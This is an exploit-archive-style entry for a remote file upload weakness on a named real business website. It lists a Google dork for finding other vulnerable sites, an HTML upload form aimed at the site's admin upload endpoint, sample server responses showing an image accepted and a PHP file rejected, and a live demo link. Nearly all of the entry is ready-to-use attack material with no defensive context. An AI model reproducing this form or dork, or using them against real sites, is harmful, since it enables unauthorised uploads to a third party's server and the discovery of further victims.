# Exploit Title: Amirtham Sweets Remote File Upload Vulnerability # Google Dork: intext:Copyrights - 2017 Amirtham Sweets # Exploit Author: Mr.T959 # Author Website : http://mr-t959.xyz # Tested on: Windows 7 -------------------------------------- # Exploit HTML Code : <form method='post' target='_blank' action='http://www.amirthamsweets.com/admin/server/php/' enctype='multipart/form-data'> <input type='file' name='files[]'><input type='submit' name='g' value='Upload Cok!'></form> # Exploit admin/server/php/ # Successful {"files[{"name":"s.jpg","size":161599,"type":"image\/jpeg","url":"http:\/\/www.amirthamsweets.com\/admin\/server\/php\/files\/s.jpg", # Error {"files":[{"name":"geo.php","size":3468,"type":"application\/octet-stream","error":"Filetype not allowed"}]} # Demo http://www.amirthamsweets.com/admin/server/php/